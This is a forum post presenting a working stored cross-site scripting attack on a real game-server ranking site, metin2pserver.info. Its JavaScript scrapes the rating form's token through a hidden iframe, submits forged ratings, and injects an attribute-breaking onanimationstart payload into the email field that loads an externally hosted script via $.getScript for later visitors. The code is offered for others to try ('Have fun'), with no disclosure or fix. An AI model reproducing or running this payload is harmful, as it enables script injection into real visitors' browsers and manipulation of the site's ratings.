metin2pserver.info - Javascript code injection example
Hi,
Here is a small example of a code injection on the top list: metin2pserver.info.
If you want to test it yourself:
I hosted the following script here (Bitte melden Sie sich an, um diesen Link zu sehen.
JavaScript
- /**
- * Rate.
- *
- * @param {string} serverId
- * @param {string} name
- * @param {string} email
- * @param {number} rating
- * @option 1 - Insufficient
- * @option 2 - Inadequate
- * @option 3 - Sufficient
- * @option 4 - Satisfying
- * @option 5 - Good
- * @option 6 - Very good
- * @param {string} comment
- * @param {number} picture
- * @option 1 - Warrior (m)
- * @option 2 - Warrior (f)
- * @option 3 - Ninja (m)
- * @option 4 - Ninja (f)
- * @option 5 - Sura (m)
- * @option 6 - Sura (f)
- * @option 7 - Shaman (m)
- * @option 8 - Shaman (f)
- */
- function rate(serverId, name, email, rating, comment, picture = 1) {
- const root = document.documentElement;
- const iframe = document.createElement('iframe');
- iframe.style.setProperty('display', 'none');
- iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;
- return new Promise((resolve) => {
- iframe.onload = () => {
- const [s] = iframe.contentDocument.getElementsByName('s');
- const token = s && s.value;
- root.removeChild(iframe);
- const data = {
- Name: name,
- Email: email,
- Rating: rating,
- Comments: comment,
- pic: picture,
- id: serverId,
- s: token,
- };
- const params = [];
- for (const param in data) {
- const value = data[param];
- params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
- }
- const body = params.join('&');
- if (token) {
- fetch(iframe.src, {
- method: 'POST',
- headers: {
- 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
- },
- body,
- })
- .then(() => resolve(true))
- .catch(() => resolve(false));
- } else {
- resolve(false);
- }
- };
- root.appendChild(iframe);
- });
- }
- if (location.hash === '#mailsywashere') {
- const serverId = /server-(.*?).html/.exec(location.href)[1];
- const name = prompt('Your name');
- const comment = prompt('Your comment');
- rate(serverId, name, '', 1, comment);
- }
To inject it, go to a server page (e. g.: Bitte melden Sie sich an, um diesen Link zu sehen.).
Launch this script on the page:
JavaScript
- /**
- * Rate.
- *
- * @param {string} serverId
- * @param {string} name
- * @param {string} email
- * @param {number} rating
- * @option 1 - Insufficient
- * @option 2 - Inadequate
- * @option 3 - Sufficient
- * @option 4 - Satisfying
- * @option 5 - Good
- * @option 6 - Very good
- * @param {string} comment
- * @param {number} picture
- * @option 1 - Warrior (m)
- * @option 2 - Warrior (f)
- * @option 3 - Ninja (m)
- * @option 4 - Ninja (f)
- * @option 5 - Sura (m)
- * @option 6 - Sura (f)
- * @option 7 - Shaman (m)
- * @option 8 - Shaman (f)
- */
- function rate(serverId, name, email, rating, comment, picture = 1) {
- const root = document.documentElement;
- const iframe = document.createElement('iframe');
- iframe.style.setProperty('display', 'none');
- iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;
- return new Promise((resolve) => {
- iframe.onload = () => {
- const [s] = iframe.contentDocument.getElementsByName('s');
- const token = s && s.value;
- root.removeChild(iframe);
- const data = {
- Name: name,
- Email: email,
- Rating: rating,
- Comments: comment,
- pic: picture,
- id: serverId,
- s: token,
- };
- const params = [];
- for (const param in data) {
- const value = data[param];
- params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
- }
- const body = params.join('&');
- if (token) {
- fetch(iframe.src, {
- method: 'POST',
- headers: {
- 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
- },
- body,
- })
- .then(() => resolve(true))
- .catch(() => resolve(false));
- } else {
- resolve(false);
- }
- };
- root.appendChild(iframe);
- });
- }
- /**
- * Inject.
- *
- * @param {string} script
- * @param {string} name
- */
- function injectScript(script, name = 'Dummy') {
- const serverId = /server-(.*?).html/.exec(location.href)[1];
- const code = `$.getScript('${script}')`;
- const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;
- console.log(`Server: ${serverId}`);
- console.log(`Name: ${name}`);
- console.log(`Script: ${script}`);
- console.log(`Injections: ${injection}`);
- return rate(serverId, name, injection, 1, '[...]');
- }
You can then inject it like this:
You can then test it like this:
Bitte melden Sie sich an, um diesen Link zu sehen.
Bitte melden Sie sich an, um diesen Link zu sehen.
Have fun 
